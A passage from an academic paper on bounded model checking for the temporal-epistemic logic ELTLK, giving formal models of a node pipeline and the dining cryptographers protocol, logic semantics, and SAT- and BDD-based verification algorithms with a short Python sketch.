Let \(state\) denote a local state of an agent, and let \(P,\,C,\,Ni\), and \(Ai\) denote, respectively, Producer, Consumer, the \(i\)-th Node, and the \(i\)-th Alarm. Further, let \(Act=Act_{P}\times \prod _{i=1}^n Act_{Ni}\times \prod _{i=1}^n Act_{Ai} \times Act_{C}\) with \(Act_{P} = \{Producing, Send_1, \epsilon _P\},\,Act_{C} = \{Send_{n+1}, Consuming, \epsilon _C\},\,Act_{Ni} = \{Send_i,Send_{i+1},Processing_i, Hang\_up_i, \epsilon _{Ni}\}\), and \(Act_{Ai} = \{Processing_i, Hang\_up_i, Reset_i, \epsilon _{Ai}\}\). Moreover, let \(a \in Act\), and let \(act_P(a),\,act_{Ni}(a),\,act_{Ai}(a)\), and \(act_C(a)\), respectively, denote an action of Producer, Node \(i\), Alarm \(i\), and Consumer.

In the IS model of the system we assume the following local evolution functions:
• \(t_P(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_P(a) = \epsilon _P\)
• \(t_P(ProdReady, a) = ProdSend\) if \(act_P(a) = Producing\)
• \(t_P(ProdSend, a ) = ProdReady\) if \(act_P(a) = Send_1\) and \(act_{N1}(a) = Send_1\)
• \(t_C(state,a) = state\) if \(act_C(a) = \epsilon _C\)
• \(t_C(ConsReady,a)=Received\) if \(act_C(a) = Send_{n+1}\) and \(act_{Nn}(a) = Send_{n+1}\)
• \(t_C(Received, a)= ConsReady\) if \(act_C(a) = Consuming\)
• if \(n=1\):
  • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\)
  • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\)
  • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{C}(a) = Send_2\)
• if \(n=2\):
  • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\)
  • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\)
  • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{N2}(a) = Send_2\)
  • \(t_{N2}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N2}(a) = \epsilon _{N2}\)
  • \(t_{N2}(Node2Ready, a) = Node2Proc\) if \(act_{N2}(a) = act_{N1}(a) = Send_2\)
  • \(t_{N2}(Node2Proc, a) = Node2Send\) if \(act_{N2}(a) = act_{A2}(a) = Processing_2\)
  • \(t_{N2}(Node2Proc, a) = Node2Proc\) if \(act_{N2}(a) = act_{A2}(a) = Hang\_up_2\)
  • \(t_{N2}(Node2Send,a)=Node2Ready\) if \(act_{N2}(a) = act_{C}(a) = Send_3\)
• if \(n{\,\geqslant \,}3\) and \(2{\,\leqslant \,}i < n\):
  • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\)
  • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\)
  • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\)
  • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{N2}(a) = Send_2\)
  • \(t_{Nn}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Nn}(a) = \epsilon _{Nn}\)
  • \(t_{Nn}(NodeNReady, a) = NodeNProc\) if \(act_{Nn}(a) = act_{Nn-1}(a) = Send_n\)
  • \(t_{Nn}(NodeNProc, a) = NodeNSend\) if \(act_{Nn}(a) = act_{An}(a) = Processing_n\)
  • \(t_{Nn}(NodeNProc, a) = NodeNProc\) if \(act_{Nn}(a) = act_{An}(a) = Hang\_up_n\)
  • \(t_{Nn}(NodeNSend,a)=NodeNReady\) if \(act_{Nn}(a) = act_{C}(a) = Send_{n+1}\)
  • \(t_{Ni}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Ni}(a) = \epsilon _{Ni}\)
  • \(t_{Ni}(NodeiReady, a) = NodeiProc\) if \(act_{Ni}(a) = act_{Ni-1}(a) = Send_i\)
  • \(t_{Ni}(NodeiProc, a) = NodeiSend\) if \(act_{Ni}(a) = act_{Ai}(a) = Processing_i\)
  • \(t_{Ni}(NodeiProc, a) = NodeiProc\) if \(act_{Ni}(a) = act_{Ai}(a) = Hang\_up_i\)
  • \(t_{Ni}(NodeiSend,a)=NodeiReady\) if \(act_{Ni}(a) = act_{Ni+1}(a) = Send_{i+1}\)
• Let \(1{\,\leqslant \,}i {\,\leqslant \,}n\):
  • \(t_{Ai}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Ai}(a) = \epsilon _{Ai}\)
  • \(t_{Ai}(AlarmiReady,a) = Problemi\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\)
  • \(t_{Ai}(AlarmiReady,a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\)
  • \(t_{Ai}(Problemi,a) = Problemi'\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\)
  • \(t_{Ai}(Problemi,a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\)
  • \(t_{Ai}(Problemi',a) = AlarmiSend\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\)
  • \(t_{Ai}(Problemi',a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\)
  • \(t_{Ai} (AlarmiSend,a) = AlarmiSend\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\)
  • \(t_{Ai} (Repairi,a) = AlarmiReady\) if \(act_{Ai}(a) = Reset_i\).

2.4.3 Dining cryptographers (DC)

The DC [10] is a scalable anonymity protocol, which has been formalised and analysed in many works, e.g., [27, 39]. Our formalisation of DC is shown in Fig. 3 and extends our earlier definition [27]. Null actions are omitted in the figure.

Fig. 3 Dining cryptographers (DC)

We model \(n\) cryptographers sitting at a round table, with coins between them, every coin seen by a pair of respective neighbours. Let \(state\) denote a local state of an agent. Let \(C_i\) and \(Coin_i\) denote the \(i\)-th cryptographer and the \(i\)-th coin, respectively. \(Counter\) denotes the agent counting utterances, and \(Oracle_i\) determines whether agent \(i\) pays, or no agent pays at all. Thus, our DC system consists of \(3n+1\) components formed by \(n\) agents and the environment. More precisely, the \(i\)-th agent consists of the following three components: \(C_i,\,Coin_i\), and \(Oracle_i\). The component \(Counter\) defines the environment. We introduce a helper function to identify the right-side neighbour of cryptographer \(i\): \(i^+ = i+1 \) for \( 1 {\,\leqslant \,}i < n\), and \(i^+ = 1\) for \(i = n\).

The protocol works as follows: first the oracles determine who is the payer (either precisely one cryptographer or none of them). Then, every cryptographer looks at the two coins he can see (his own and his right neighbour's), and records the result (the states \(seeD\) and \(seeE\) correspond to seeing different or equal coin sides, respectively).
The final utterance of each cryptographer (the \(sayD\) and \(sayE\) locations correspond to saying different and equal outcomes, respectively) depends on what result is seen and whether the cryptographer has paid or not. Finally, the counter counts the utterances, determining the final result of the protocol.

Let \(Act=Act_{Counter}\times \prod _{i=1}^n Act_{C_i}\times \prod _{i=1}^n Act_{Coin_i} \times \prod _{i=1}^n Act_{Oracle_i}\) with
• \(Act_{Counter} = \{se_1, sd_1, \cdots , se_n, sd_n, \epsilon _{Counter}\}\),
• \(Act_{Coin_i} = \{tt_i, hh_i, ht_i, th_i, tt_{i^+}, hh_{i^+},ht_{i^+},th_{i^+},\epsilon _{Coin_i}\}\),
• \(Act_{Oracle_i} = \{pay_0, \dots , pay_{n}, t_i, h_i, paid_i, not\_paid_i, \epsilon _{Oracle_i}\}\), and
• \(Act_{C_i} = \{pay_0, \dots , pay_{n},tt_i, hh_i, ht_i, th_i, not\_paid_i, paid_i, se_i, sd_i, \epsilon _{C_i}\}\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\).

Moreover, let \(a \in Act\), and let \(act_{Counter}(a),\,act_{C_i}(a),\,act_{Coin_i}(a)\), and \(act_{Oracle_i}(a)\), respectively, denote an action of Counter, Cryptographer \(i\), Coin \(i\), and Oracle \(i\).

In the IS model of the system we assume the following local evolution functions (we provide definitions for the \(C_i\) and \(Oracle_i\) components; the remaining ones are straightforward):

The local evolution for \(Oracle_i\) is defined as follows:
• \(t_{Oracle_i}(state, a) = state\) iff \(a \ne {\overline{\epsilon }}\) and \(act_{Oracle_i}(a) =\epsilon _{Oracle_i}\)
• \(t_{Oracle_i}(start, a) = tossed\) iff \(act_{Oracle_i}(a) = act_{Coin_i}(a)= t_i\) or \(act_{Oracle_i}(a) = act_{Coin_i}(a)= h_i\)
• \(t_{Oracle_i}(tossed, a) = paid\) iff \(act_{Oracle_1}(a)= \ldots = act_{Oracle_n}(a) = pay_i\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_i\)
• \(t_{Oracle_i}(tossed, a) = not\_paid\) iff either \(act_{Oracle_1}(a)= \ldots = act_{Oracle_n}(a) = pay_0\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_0\), or \(act_{Oracle_1}(a)=\ldots = act_{Oracle_n}(a) = pay_j\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_j\) for some \(j\) such that \(1{\,\leqslant \,}j {\,\leqslant \,}n\) and \(j \not =i\)

The local evolution for \(C_i\) is defined as follows:
• \(t_{C_i}(state, a) = state\) iff \(a \ne {\overline{\epsilon }}\) and \(act_{C_i}(a)=\epsilon _{C_i}\)
• \(t_{C_i}(start, a) = decided\) iff \(act_{Oracle_1}(a)=\ldots = act_{Oracle_n}(a) = pay_j\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_j\) for some \(j\) such that \(0{\,\leqslant \,}j {\,\leqslant \,}n\)
• \(t_{C_i}(decided, a) = {seeD}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = th_i\)
• \(t_{C_i}(decided, a) = {seeD}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = ht_i\)
• \(t_{C_i}(decided, a) = {seeE}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = hh_i\)
• \(t_{C_i}(decided, a) = {seeE}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = tt_i\)
• \(t_{C_i}(seeE, a) = {sayD}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = paid_i\)
• \(t_{C_i}(seeD, a) = {sayE}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = paid_i\)
• \(t_{C_i}(seeD, a) = {sayD}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = not\_paid_i\)
• \(t_{C_i}(seeE, a) = {sayE}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = not\_paid_i\)

Because of the way in which the local evolution functions are defined, obtaining the global evolution function for the IIS requires only that the components not mentioned in each of the above definitions execute their respective \(\epsilon \) actions.
For example, because we provide separate actions for every payment configuration, there is no need to enforce any additional conditions at the global level. In the model we assume the following set of propositional variables: \({\mathcal{PV }}=\{ odd, paid_1, \ldots , paid_n \}\) with the following interpretation:
• \((M,g)\models odd\) if \(l_{Counter}(g)= odd\),
• \((M,g)\models paid_i\) if \(l_{Oracle_i}(g)= paid\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\).

2.5 LTLK and its two subsets: ELTLK and LTL

Combinations of linear time with knowledge have long been used in the analysis of temporal epistemic properties of multi-agent systems [16]. We now recall the basic definitions and adapt them to our purposes when needed.

2.5.1 Syntax

Let \(\mathcal{PV }\) be a set of propositional variables to be interpreted over the global states of a system, \(p \in \mathcal{PV }\), and \({\varGamma } \subseteq \mathcal{A }\). The LTLK formulae in the negation normal form are given by the following grammar:
$$\begin{aligned}&\varphi :{:=} {{true}}\mid {false}\mid p\, \mid \, \lnot p\,\mid \, \varphi \wedge \varphi \,\mid \, \varphi \vee \varphi \,\mid \, \mathrm{X}\varphi \, \mid \, \varphi \mathrm{U}\varphi \,\mid \, \varphi \mathrm{R}\varphi \,\mid \\&\quad \quad \mathrm{{K}}_{{ c}}\varphi \,\mid \, {\overline{\mathrm{{K}}}}_{{ c}}\varphi \,\mid \, \mathrm{E}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{E}}}_{\varGamma }\varphi \,\mid \, \mathrm{{D}}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{{D}}}}_{\varGamma }\varphi \,\mid \, \mathrm{{C}}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{{C}}}}_{\varGamma }\varphi . \end{aligned}$$

The temporal modalities \(\mathrm{U}\) and \(\mathrm{R}\) are named, as usual, until and release, respectively, and \(\mathrm{X}\) is the next step modality. The derived basic temporal modalities are defined as follows: \(\mathrm{F}\varphi {\stackrel{def}{=}} {{true}}\mathrm{U}\varphi \) and \(\mathrm{G}\varphi {\stackrel{def}{=}} {false}\mathrm{R}\varphi \). The epistemic operator \(\mathrm{{K}}_{{ c}}\varphi \) represents "agent \({{ c}}\) knows \(\varphi \)", while the operator \({\overline{\mathrm{{K}}}}_{{ c}} \varphi \) is the corresponding dual one representing "agent \({{ c}}\) considers \(\varphi \) possible". The epistemic operators \(\mathrm{{D}}_\varGamma , \mathrm{E}_\varGamma ,\) and \(\mathrm{{C}}_\varGamma \) represent distributed knowledge in the group \(\varGamma \), "everyone in \(\varGamma \) knows", and common knowledge among agents in \(\varGamma \), respectively. The epistemic operators \({\overline{\mathrm{{D}}}}_\varGamma ,{\overline{\mathrm{E}}}_\varGamma ,\) and \({\overline{\mathrm{{C}}}}_\varGamma \) are the corresponding dual ones.

Note that LTL is the sublogic of LTLK which consists only of the formulae built without the epistemic operators, i.e., LTL formulae are defined by the following grammar:
$$\begin{aligned} \varphi :{:=} {{true}}\mid {false}\mid p \mid \lnot p \mid \varphi \wedge \varphi \mid \varphi \vee \varphi \mid \mathrm{X}\varphi \mid \varphi \mathrm{U}\varphi \mid \varphi \mathrm{R}\varphi . \end{aligned}$$
ELTLK is the existential fragment of LTLK, defined by the following grammar:
$$\begin{aligned} \varphi :\!{:=} {{true}}\mid {false}\mid p \mid \lnot p \mid \varphi \wedge \varphi \mid \varphi \vee \varphi \mid \mathrm{X}\varphi \mid \varphi \mathrm{U}\varphi \mid \varphi \mathrm{R}\varphi \mid {\overline{\mathrm{{K}}}}_{{ c}}\varphi \mid {\overline{\mathrm{E}}}_{\varGamma }\varphi \mid {\overline{\mathrm{{D}}}}_{\varGamma }\varphi \mid {\overline{\mathrm{{C}}}}_{\varGamma }\varphi . \end{aligned}$$

Observe that we assume that the LTLK (and so LTL and ELTLK) formulae are given in the negation normal form (NNF), in which negation can be applied only to propositional variables.

2.5.2 Semantics

Let \(M=(G,\iota , T, \{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }}, \mathcal{V })\) be a model, and let \(\rho \) be a path or run. By \(\rho (i)\) we denote the \(i\)-th state of \(\rho \), and by \(\rho [m]\) we denote the path or run \(\rho \) with a designated formula evaluation position \(m\), where \(m \unlhd _\rho length(\rho )\). Further, let \(\varGamma \subseteq \mathcal{A }\). We use the following standard relations to give semantics to the "everyone knows", "common knowledge", and "distributed knowledge" modalities: \(\sim ^E_\varGamma = \bigcup _{{{ c}} \in \varGamma }\sim _{{ c}}\); \(\sim ^C_\varGamma \) is the transitive closure of \(\sim ^E_\varGamma \); and \(\sim ^D_\varGamma = \bigcap _{{{ c}} \in \varGamma }\sim _{{ c}}\). We say that an LTLK formula \(\varphi \) is true along \(\rho \) (in symbols \(M,\rho \models \varphi \)) iff \(M, \rho [0] \models \varphi \), where
$$\begin{aligned} \begin{array}{l@{\quad }l} M, \rho [m] \models {{true}}&{} \\ M, \rho [m] \not \models {false}&{} \\ M, \rho [m] \models p \text { iff }&{} p \in {\mathcal{V }}(\rho (m)) \\ M, \rho [m] \models \lnot p \text { iff }&{} p \not \in {\mathcal{V }}(\rho (m)) \\ M, \rho [m] \models \varphi \wedge \psi \text { iff }&{} M, \rho [m] \models \varphi \text { and } M, \rho [m] \models \psi \\ M, \rho [m] \models \varphi \vee \psi \text { iff }&{} M, \rho [m] \models \varphi \text { or } M, \rho [m] \models \psi \\ M, \rho [m] \models \mathrm{X}\varphi \text { iff }&{} length(\rho ) > m \text { and } M, \rho [m+1] \models \varphi \\ M, \rho [m] \models \varphi \mathrm{U}\psi \text { iff }&{} (\exists k\ge m)(M, \rho [k]\models \psi \text { and } (\forall m \le j < k)M, \rho [j]\models \varphi ) \\ M, \rho [m] \models \varphi \mathrm{R}\psi \text { iff }&{} (\rho \in \varPi ^\omega (\iota ) \text { and } (\forall k\ge m) M, \rho [k]\models \psi ) \text { or }\\ &{} (\exists k\ge m) (M, \rho [k]\models \varphi \text { and } (\forall m \le j \le k) M, \rho [j]\models \psi ) \\ M, \rho [m] \models \mathrm{{K}}_{ c}\varphi \text { iff }&{} (\forall \rho ' \in \varPi ^\omega (\iota )) (\forall k{\,\geqslant \,}0)( \rho '(k) \sim _{ c}\rho (m) \text { implies } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models {\overline{\mathrm{{K}}}}_{ c}\varphi \text { iff }&{} (\exists \rho ' \in \varPi (\iota ))(\exists k{\,\geqslant \,}0)(\rho '(k) \sim _{ c}\rho (m) \text { and } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models \mathrm{Y}_\varGamma \varphi \text { iff }&{} (\forall \rho ' \in \varPi ^\omega (\iota )) (\forall k{\,\geqslant \,}0)( \rho '(k) \sim ^\mathrm{Y}_\varGamma \rho (m) \text { implies } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models \overline{\mathrm{Y}}_\varGamma \varphi \text { iff }&{} (\exists \rho ' \in \varPi (\iota ))(\exists k{\,\geqslant \,}0)(\rho '(k) \sim ^\mathrm{Y}_\varGamma \rho (m) \text { and } M,\rho '[k] \models \varphi ) , \\ &{}\text { where } \mathrm{Y}\in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}.\\ \end{array} \end{aligned}$$

Let \(g\) be a global state of \(M\) and \(\varphi \) an LTLK formula. We assume the following notations:
• \(M,g \models \varphi \) iff \(M,\rho \models \varphi \) for all the runs \(\rho \in \varPi ^\omega (g)\).
• \(M \models \varphi \) iff \(M,\iota \models \varphi \).
• \(M,g \models ^\exists \varphi \) iff \(M,\rho \models \varphi \) for some path or run \(\rho \in \varPi (g)\).
• \(Props(\varphi )\) is the set of the propositional variables appearing in \(\varphi \).

Let \(m\) be a formula evaluation position, and \(p,q \in \mathcal{PV }\). An illustration of the semantics is shown in Figs. 4, 5 and 6.

Fig. 4 Evaluation of formulae of the types Next state and Until
Fig. 5 Evaluation of formulae of the Release type
Fig. 6 Evaluation of existential epistemic formulae. The highlighted states are epistemically equivalent

Given the above, we say that:
• the LTLK formula \(\varphi \) holds in the model \(M\) (written \(M \models \varphi \)) iff \(M,\rho \models \varphi \) for all runs \(\rho \in \varPi ^\omega (\iota )\);
• the ELTLK formula \(\varphi \) holds in the model \(M\) (written \(M \models ^{\exists } \varphi \)) iff \(M,\rho \models \varphi \) for some path or run \(\rho \in \varPi (\iota )\).

Determining whether an LTLK formula \(\varphi \) is existentially (resp. universally) valid in a model \(M\) is called the existential (resp. universal) model checking problem. In other words, the universal model checking problem asks whether \(M \models \varphi \), and the existential model checking problem asks whether \(M \models ^{\exists } \varphi \). In order to solve the universal model checking problem, one can negate the formula and show that the existential model checking problem for the negated formula has no solution. Intuitively, we are trying to find a counterexample, and if we do not succeed, then the formula is universally valid. Now, since bounded model checking is designed for finding a solution to an existential model checking problem, in this paper we only consider the properties expressible in ELTLK. This is because finding a counterexample, for example, to \(M\models \mathrm{G}\mathrm{{K}}_{{ c}} p\) corresponds to the question whether there exists a witness to \(M\models ^\exists \mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\lnot p\).

Our semantics meets two important properties. Firstly, for LTLK the definition of validity in a model \(M\) uses runs only. Secondly, if we replace each \(\varPi \) with \(\varPi ^\omega \), the semantics does not change, as our models have total transition relations (each path is a prefix of some run). The semantics applied to submodels of \(M\) does not have the above property, but it preserves ELTLK over \(M\), which is shown in Lemma 1. Moreover, note that in the above semantics, in the definition of the until operator \(\rho \) may be an arbitrary path or run (i.e., \(\rho \in \varPi \)). However, in the definition of the release operator we insist on \(\rho \) being a run that starts in the initial state in the part of the definition that corresponds to the globally operator.

2.6 Comments on IS and IIS

There is a variety of models of multi-agent systems. A fundamental dimension along which these models differ is the degree to which the activity of the agents is synchronised.
At one end of the spectrum is the synchronous model, in which the agents act in a sequence of rounds. In each round, an agent performs an action that affects the other agents, is affected by the actions executed by the other agents in that round, and changes its state. All agents perform actions at exactly the same time. At the other end is the asynchronous model, in which there is no bound on the amount of time that can elapse between agents’ actions, and no bound on the time it can take for an agent to act. Between these extremes lie the semi-synchronous models, in which the times of agents’ actions can vary, but are bounded by constant lower and upper bounds. Now, observe that under the interpreted systems semantics the agents perform a joint action at a given time in a global state, which means that interpreted systems assume the synchronous semantics. In the interleaved interpreted systems, in contrast, only one local or shared action may be performed by the agents at a given time in a global state; hence, the interleaved interpreted systems define the asynchronous semantics. Systems can be modelled using both IIS and IS. The idea is not to convert an IS into an IIS, but rather to use both representations, which are independently defined starting from a description of a system. However, for many systems an IIS model is a submodel of the corresponding IS model (i.e., the set of states of the IIS model is a subset of the set of states of the corresponding IS model, and the transition relation of the IIS model is a subset of the transition relation of the corresponding IS model), and then we can discuss the complexity of converting an IS encoding into an IIS one. In such a case, it follows from the definitions of IS and IIS that each computation of the Kripke model generated by the IIS is also a valid computation of the Kripke model generated by the IS. Thus, if an ELTLK formula is valid in the model generated by the IIS, then this formula is also valid in the model generated by the IS. However, the converse implication does not hold. Further, if we have a propositional formula \(\varphi \) that encodes the transition relation of the Kripke model generated by an IS such that the null action is enabled at each local state, then we can convert it to the formula \(\varphi \wedge \varphi '\) that encodes the transition relation of the Kripke model generated by the IIS, where the length of \(\varphi '\) is \(O(n\cdot \log (n))\) and \(n\) is the number of the agents. The formula \(\varphi '\) forces the agents to work in an asynchronous way. 3 Bounded model checking The main idea of SAT-based BMC methods consists in translating the existential model checking problem [12, 48] for a modal (e.g., temporal, epistemic, deontic) logic to the propositional satisfiability problem, i.e., it consists in representing a counterexample-trace of bounded length by a propositional formula and checking the resulting propositional formula with a specialised SAT-solver. If the formula in question is satisfiable, then a satisfying assignment returned by the SAT-solver can be converted into a concrete counterexample that shows that the property is violated. Otherwise, the bound is increased and the process repeated.
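To make this search loop concrete, the following minimal Python sketch mirrors the bound-increasing procedure just described. It is a sketch, not the implementation used in the paper: the names \(bmc\_sat\), \(translate\) and \(check\_sat\) are hypothetical, and a brute-force enumeration of assignments stands in for the specialised SAT-solver.

```python
from itertools import product

def check_sat(formula, num_vars):
    """Toy stand-in for a SAT solver: `formula` is a Python predicate
    over a tuple of Booleans. Returns a satisfying assignment or None.
    A real BMC tool would hand a CNF to an off-the-shelf SAT solver."""
    for assignment in product((False, True), repeat=num_vars):
        if formula(assignment):
            return assignment
    return None

def bmc_sat(translate, max_bound):
    """Generic SAT-based BMC loop: translate(k) yields the propositional
    encoding of 'some witness of length k exists' as (predicate, num_vars)."""
    for k in range(max_bound + 1):
        formula, num_vars = translate(k)
        witness = check_sat(formula, num_vars)
        if witness is not None:
            return k, witness      # satisfying assignment = concrete witness
    return None                    # no witness found up to max_bound
```

Here \(translate(k)\) would correspond to the encoding \([M,\varphi ]_{k}\) defined later in Sect. 3.2.3.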
Let \(M\) be a model for a system \(S\), \(\varphi \) an existential formula describing a property \(P\) to be tested, and \(k \in \mathrm{I\!N}\) a bound. Moreover, let \(tr_k(\varphi )\) be a propositional formula that is satisfiable if and only if the formula \(\varphi \) holds in the model \(M\) for the bound \(k\). Algorithm 1 shows the general SAT-based BMC approach. In Algorithm 1 we use the procedure \(checkSat(\gamma )\) that for any given propositional formula \(\gamma \) returns one of three possible values: \(\mathsf SAT \), \(\mathsf UNSAT \), or \(\mathsf UNKNOWN \). The meanings of the values \(\mathsf SAT \) and \(\mathsf UNSAT \) are self-evident. The value \(\mathsf UNKNOWN \) is returned either if the procedure \(checkSat\) is not able to decide the satisfiability of its argument within some preset timeout period, or if it has to terminate due to exhaustion of the available memory. The crux of BDD-based BMC is to interleave the verification with the construction of the reachable states. Algorithm 2 illustrates the general idea of the BDD-based bounded model checking method. With \(\mathcal{M }_0\) we denote the submodel that consists of the initial state of \(M\) only, and \({\mathcal{M }}_{\leadsto }\) denotes the model that extends the model \(\mathcal{M }\) with all the immediate successors of the states of \(\mathcal M \). At each step of the state space construction we obtain a submodel (denoted with \(\mathcal M \)) of the analysed model \(M\), which is used to verify (line 4) the existential formula. These steps are applied repeatedly until the fixed point of the state space construction is reached, i.e., \(\mathcal{M } = \mathcal{M }'\), or a witness for the verified formula is found. The number of iterations needed for the algorithm to complete is counted using the variable \(k\), which is later used in the evaluation of the approach.
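The interleaving of verification and reachability can be rendered as the following minimal Python sketch, with ordinary sets standing in for BDDs; the names \(bmc\_bdd\), \(post\) and \(check\) are hypothetical, and \(check\) plays the role of line 4 of Algorithm 2.

```python
def bmc_bdd(initial, post, check):
    """BDD-based BMC loop (Algorithm 2 in spirit). post(S) returns the
    set of immediate successors of the states in S; check(S) decides
    whether the existential formula holds in the submodel over S."""
    reach, k = {initial}, 0
    while True:
        if check(reach):             # verification interleaved with
            return True, k           # the reachability analysis
        frontier = reach | post(reach)
        if frontier == reach:        # fixed point: all reachable states
            return False, k
        reach, k = frontier, k + 1
```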
3.1 BDD-based Approach In this section we show how to perform bounded model checking for ELTLK using BDDs [12] by combining the standard approach for ELTL [11] with the method for the epistemic operators [43], similarly to the solution for \(\mathrm{CTL}^{*}\) of [12]. Definition 1 Let \(\mathcal{PV }\) be a set of propositions. For an ELTLK formula \(\varphi \) we define inductively the number \(\gamma {(\varphi )}\) of nested epistemic operators in the formula: • if \(\varphi = p\), where \(p \in \mathcal{PV }\), then \(\gamma {(\varphi )} = 0\), • if \(\varphi = \odot \varphi '\) and \(\odot \in \{ \lnot , \mathrm{X}\}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')}\), • if \(\varphi = \varphi ' \odot \varphi ''\) and \(\odot \in \{ \wedge , \vee , \mathrm{U}, \mathrm{R}\}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')} + \gamma {(\varphi '')}\), • if \(\varphi = \mathrm{Y}\varphi '\) and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')} + 1\). Definition 2 Let \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\). If \(\varphi = \mathrm{Y}\psi \) is an ELTLK formula, by \(sub(\varphi )\) we denote the immediate subformula \(\psi \) of the epistemic operator \(\mathrm{Y}\). Moreover, for an arbitrary ELTLK formula \(\varphi \) we define inductively the set \({\mathcal{Y }}(\varphi )\) of its subformulae of the form \(\mathrm{Y}\psi \): • if \(\varphi = p\), where \(p \in \mathcal{PV }\), then \({\mathcal{Y }}(\varphi ) = \emptyset \), • if \(\varphi = \odot \varphi '\) and \(\odot \in \{ \lnot , \mathrm{X}\}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ')\), • if \(\varphi = \varphi ' \odot \varphi ''\) and \(\odot \in \{ \wedge , \vee , \mathrm{U}, \mathrm{R}\}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ') \cup {\mathcal{Y }}(\varphi '')\), • if \(\varphi = \mathrm{Y}\varphi '\) and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ') \cup \{\varphi \}\). Definition 3 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) and \(U\subseteq G\) with \(\iota \in U\). The submodel generated by \(U\) is a tuple \(M{|_U} = (U, \iota , T', \{\sim '_{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V }')\), where \(T' = T \cap U^2\), \(\sim _{ c}' =\ \sim _{ c}\cap ~U^2\) for each \({ c}\in \mathcal{A }\), and \(\mathcal{V }'\) is the restriction of \(\mathcal{V }\) to \(U\). For ELTLK formulae \(\varphi , \psi \), and \(\psi '\), by \(\varphi {[\psi \leftarrow \psi ']}\) we denote the formula \(\varphi \) in which every occurrence of \(\psi \) is replaced with \(\psi '\). Let \(M= (G, \iota , T, \{\sim 